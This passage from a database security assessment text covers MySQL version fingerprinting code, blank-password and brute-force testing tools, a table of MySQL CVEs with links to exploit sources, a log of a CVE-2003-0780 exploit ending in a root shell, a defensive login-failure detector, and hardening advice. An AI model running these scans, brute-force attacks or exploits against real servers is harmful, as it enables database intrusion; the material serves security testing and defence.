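# prints as '(' and the protocol byte 0x0a as a newline, as in the telnet output.
_HANDSHAKE = (b"\x0a" + b"3.23.52\x00" + b"\x07\x00\x00\x00" + b"D~n.7i.G" + b"\x00"
              + b"\x2c\x00" + b"\x08" + b"\x02\x00" + b"\x00" * 13)
SAMPLE_HANDSHAKE = len(_HANDSHAKE).to_bytes(3, "little") + b"\x00" + _HANDSHAKE

# Constructed error packet for a client not on the allow list: 0xff, error
# 1130 little-endian, then the message; 80 bytes, so the length byte prints as 'P'.
_ERROR = (b"\xff" + (1130).to_bytes(2, "little")
          + b"Host 'cyberforce.segfault.net' is not allowed to connect to this MySQL server")
SAMPLE_ERROR = len(_ERROR).to_bytes(3, "little") + b"\x00" + _ERROR


def parse_mysql_greeting(data: bytes) -> Dict[str, object]:
    """Return {'kind': 'handshake', 'protocol': n, 'version': s} or
    {'kind': 'error', 'code': n, 'message': s} for the server's first packet."""
    if len(data) < 5:
        raise ValueError("packet too short")
    length = int.from_bytes(data[0:3], "little")
    payload = data[4:4 + length]          # data[3] is the sequence id
    if len(payload) != length:
        raise ValueError("truncated packet")
    if payload[0] == 0xFF:
        code = int.from_bytes(payload[1:3], "little")
        message = payload[3:]
        if message[:1] == b"#":           # optional '#' + 5-char SQLSTATE marker
            message = message[6:]
        return {"kind": "error", "code": code,
                "message": message.decode("latin-1")}
    end = payload.index(b"\x00", 1)       # server version is NUL-terminated
    return {"kind": "handshake", "protocol": payload[0],
            "version": payload[1:end].decode("ascii")}


def version_tuple(version: str) -> Tuple[int, ...]:
    """'3.23.52' -> (3, 23, 52); build suffixes such as '5.0.21-log' are dropped
    so versions compare numerically against a baseline you choose."""
    core = version.split("-")[0]
    return tuple(int(part) for part in core.split("."))


def grab_greeting(host: str, port: int = 3306, timeout: float = 3.0) -> Dict[str, object]:
    """Connect, read the server's greeting and return the parsed result.
    Nothing is sent to the server; it volunteers the version on connect."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = sock.recv(4096)
    return parse_mysql_greeting(data)


if __name__ == "__main__":
    print(parse_mysql_greeting(SAMPLE_HANDSHAKE))
    print(parse_mysql_greeting(SAMPLE_ERROR))
```

Because the server volunteers its version before any authentication, the decoder is enough to inventory exposed MySQL versions across your own ranges; an error 1130 reply tells you a host allow list is in place, which is the response you want to see from untrusted networks.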

MySQL Brute Force

By default, the MySQL database accepts user logins as root with no password. A simple Unix-based utility called finger_mysql is useful for testing network blocks for MySQL instances that accept a blank root password, available in source form at http://www.securiteam.com/tools/6y00l0u5pc.html.

When the tool compromises the database, it lists the users and their password hashes from the mysql.user table. There are a number of tools in the Packet Storm archive that can be used to crack these encrypted passwords.

If a blank root password doesn’t provide access, the THC Hydra utility can be used to launch a parallel MySQL brute-force attack.

MetaCoretex can also assess MySQL instances efficiently, performing brute-force password grinding and assessing the underlying database configuration and features.
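Password grinding of the kind described in this section and in the SQL Server Brute Force section earlier leaves a distinctive trail on the server: a burst of failed logins from one source, often across several usernames. As an added example (not code from the book or from any vendor tool), the following Python detector reads the MySQL error-log message "Access denied for user 'u'@'host'" and the SQL Server 18456 message "Login failed for user 'u'. ... [CLIENT: ip]" and raises one alert per source once a threshold of failures falls inside a sliding window. The sample log lines are constructed, the ISO-8601 timestamp prefix on each line is an assumption about your collector, and parse_failure and detect_password_grinding are names chosen for this example.

```python
"""Added example: detect password grinding against SQL Server and MySQL from
their failed-login messages.  Not part of the book or of any vendor tool."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional

# Assumption: a collector prefixes each message with an ISO-8601 timestamp.
TS_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\s+(?P<rest>.*)$")

# Message shapes: MySQL error log "Access denied for user 'u'@'host'" and the
# SQL Server 18456 text "Login failed for user 'u'. ... [CLIENT: ip]".
FAILURE_RES = [
    ("mysql", re.compile(r"Access denied for user '(?P<user>[^']*)'@'(?P<src>[^']+)'")),
    ("mssql", re.compile(r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<src>[^\]]+)\]")),
]

# Constructed sample log: a wordlist attack on MySQL from 10.0.0.99, one genuine
# typo from 10.0.0.7, and sa guessing against SQL Server from 192.168.1.20.
SAMPLE_LOG = """\
2006-05-03T10:15:01 mysqld: Access denied for user 'root'@'10.0.0.99' (using password: YES)
2006-05-03T10:15:02 mysqld: Access denied for user 'root'@'10.0.0.99' (using password: YES)
2006-05-03T10:15:02 mysqld: Access denied for user 'admin'@'10.0.0.99' (using password: NO)
2006-05-03T10:15:03 mysqld: Access denied for user 'root'@'10.0.0.7' (using password: YES)
2006-05-03T10:15:03 mysqld: Access denied for user 'root'@'10.0.0.99' (using password: YES)
2006-05-03T10:15:04 mysqld: Access denied for user 'test'@'10.0.0.99' (using password: YES)
2006-05-03T10:15:05 mysqld: Access denied for user 'root'@'10.0.0.99' (using password: YES)
2006-05-03T10:15:06 mysqld: Version: '3.23.52'  socket: '/tmp/mysql.sock'  port: 3306
2006-05-03T10:15:10 MSSQLSERVER: Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.20]
2006-05-03T10:15:11 MSSQLSERVER: Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.20]
2006-05-03T10:15:12 MSSQLSERVER: Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.20]
2006-05-03T10:15:13 MSSQLSERVER: Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.20]
2006-05-03T10:15:14 MSSQLSERVER: Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.20]
2006-05-03T10:20:00 mysqld: Access denied for user 'root'@'10.0.0.7' (using password: YES)
"""


def parse_failure(line: str) -> Optional[Dict[str, object]]:
    """Return {'ts', 'service', 'user', 'src'} for a failed login line, else None."""
    m = TS_RE.match(line)
    if not m:
        return None
    for service, pattern in FAILURE_RES:
        f = pattern.search(m["rest"])
        if f:
            return {"ts": datetime.fromisoformat(m["ts"]), "service": service,
                    "user": f["user"], "src": f["src"]}
    return None


def detect_password_grinding(lines: Iterable[str], threshold: int = 5,
                             window: timedelta = timedelta(seconds=60)) -> List[Dict[str, object]]:
    """Raise one alert per (source, service) once `threshold` failures fall
    inside the sliding `window`; distinct_users > 1 points at a list of
    account names being tried rather than repeated guesses at one login."""
    recent = defaultdict(deque)   # (src, service) -> deque of (ts, user)
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse_failure(line)
        if ev is None:
            continue
        key = (ev["src"], ev["service"])
        q = recent[key]
        q.append((ev["ts"], ev["user"]))
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()               # drop failures that fell out of the window
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": ev["src"], "service": ev["service"],
                           "failures": len(q),
                           "distinct_users": len({user for _, user in q}),
                           "first": q[0][0], "last": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_password_grinding(SAMPLE_LOG.splitlines()):
        print(alert)
```

Lines that match neither pattern are ignored, so adapt FAILURE_RES to the exact message text your MySQL and SQL Server releases log; the threshold and window are starting points to tune against your own baseline of genuine failed logins.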

MySQL Process Manipulation Vulnerabilities

At the time of this writing, MITRE CVE (http://cve.mitre.org) lists a number of serious, remotely exploitable vulnerabilities in MySQL (i.e., not authenticated or denial-of-service issues), as shown in Table 9-7.

Table 9-7. Remotely exploitable MySQL vulnerabilities

CVE reference(s)                  Date         Notes
CVE-2006-4226                     17/08/2006   MySQL 5.1.11, 5.0.24, and 4.1.20 post-authentication database access issue relating to case-sensitive filesystems
CVE-2006-2753                     31/05/2006   MySQL 5.0.21 and 4.1.19 post-authentication SQL injection through multibyte encoded escape characters
CVE-2006-1518                     03/05/2006   MySQL 5.0.20 post-authentication COM_TABLE_DUMP request overflow
CVE-2006-1517                     03/05/2006   MySQL 5.0.20, 4.1.18, and 4.0.26 post-authentication information leak via COM_TABLE_DUMP request
CVE-2006-1516                     03/05/2006   MySQL 5.0.20, 4.1.18, and 4.0.26 information leak via malformed username
CVE-2005-2572 and CVE-2005-2573   08/08/2005   Multiple Windows MySQL post-authentication issues resulting in DoS and potential arbitrary code execution
CVE-2005-2558                     08/08/2005   MySQL 5.0.7-beta and 4.1.13 post-authentication init_syms( ) overflow
CVE-2005-0709 and CVE-2004-0710   11/03/2005   MySQL 4.1.10 post-authentication library access issues, resulting in arbitrary code execution
CVE-2004-0836                     20/08/2004   MySQL 4.0.20 mysql_real_connect( ) overflow using a malicious DNS server
CVE-2004-0627 and CVE-2004-0628   01/07/2004   MySQL 4.1.2 zero-length scrambled string authentication bypass and overflow
CVE-2003-0780                     10/09/2003   MySQL 4.0.15 post-authentication privilege escalation vulnerability
CVE-2002-1374 and CVE-2002-1375   12/12/2002   MySQL 4.0.5a COM_CHANGE_USER password overflow and authentication bypass
CVE-2001-1453                     09/02/2001   MySQL 3.22.33 crafted client hostname overflow
CVE-2000-0148                     08/02/2000   MySQL 3.22.32 unauthenticated remote access vulnerability

MySQL exploit scripts

The original BugTraq posting from May 3, 2006, regarding CVE-2006-1516, CVE-2006-1517, and CVE-2006-1518 is accessible at: http://www.securityfocus.com/archive/1/archive/1/432734/100/0/threaded.

A proof-of-concept exploit script for CVE-2004-0627 (MySQL 4.1.2 authentication bypass) is available from http://www.securiteam.com/exploits/5ep0720dfs.html. A handful of other exploits for MySQL issues are available from http://www.milw0rm.com.

An exploit for CVE-2003-0780 (MySQL 4.0.15 post-authentication privilege escalation issue) is available at http://packetstormsecurity.org/0309-exploits/09.14.mysql.c. Example 9-9 shows the exploit script in use against a vulnerable MySQL server, providing root access to the operating system. For exploit usage and options, simply run the tool with no arguments.

Example 9-9. Using the CVE-2003-0780 exploit against MySQL
$ ./mysql -d 10.0.0.8 -p "" -t 1
@-------------------------------------------------@
#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #
@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @
---------------------------------------------------
[+] Connecting to mysql server 10.0.0.8:3306....ok
[+] ALTER user column...ok
[+] Select a valid user...ok
[+] Found a user:test
[+] Password length:480
[+] Modified password...ok
[+] Finding client socket......ok
[+] socketfd:3
[+] Overflow server....ok
[+] sending OOB.......ok
[+] Waiting a shell.....
bash-2.05#

Exploitation framework support for MySQL.

At the time of this writing, MSF supports none of these MySQL issues. CORE IMPACT supports CVE-2005-0709 (MySQL 4.1.10 post-authentication arbitrary code execution), CVE-2003-0780 (MySQL 4.0.15 post-authentication privilege escalation), and CVE-2002-1374 (MySQL 4.0.5a COM_CHANGE_USER overflow).

Immunity CANVAS supports CVE-2004-0627 (MySQL 4.1.2 authentication bypass) at this time, and in terms of add-on exploit packs, GLEG VulnDisco has a number of zero-day post-authentication exploit and DoS modules for MySQL 5.x and 4.1.x, and Argeniss 0day ultimate exploits pack has a number of DoS modules for MySQL 5.x.

MySQL UDF library injection.

In Chris Anley’s “Hackproofing MySQL” paper at http://www.ngssoftware.com/papers/hackproofingmysql.pdf, he discusses using User Defined Function (UDF) support to load a custom-written dynamic library and in turn, to execute arbitrary commands on the underlying operating platform. The exploit and discussion text are available from the following locations:

http://www.securiteam.com/exploits/6g00p1pc0u.html
http://www.0xdeadbeef.info/exploits/raptor_udf.c

Database Services Countermeasures

The following countermeasures should be considered when hardening database services:

  • Ensure that database user passwords (sa and probe accounts found in Microsoft SQL Server, root under MySQL, etc.) are adequately strong.

  • Filter and control public Internet-based access to database service ports to prevent determined attackers from launching brute-force password-grinding attacks in particular. In the case of Oracle with the TNS Listener, this point is extremely important.

  • Don’t run publicly accessible remote maintenance services on database servers; this deters attacks such as creating a user’s .rhosts file through the Oracle TNS Listener and other grappling-hook attacks. If possible, use two-factor authentication for remote access from specific staging hosts, or SSH with public keys.

  • There are so many outstanding and zero-day weaknesses in Oracle that it is imperative that your Oracle database services be patched as soon as CPU packages are available. Oracle databases should also be hardened to prevent access to unnecessary stored procedures and features. Oracle database server is so feature-rich that it is problematic to secure without a deep understanding.

  • If SQL services are accessible from the Internet or other untrusted networks, ensure they are patched with the latest service packs and security hotfixes to ensure resilience from buffer overflows and other types of remote attacks.
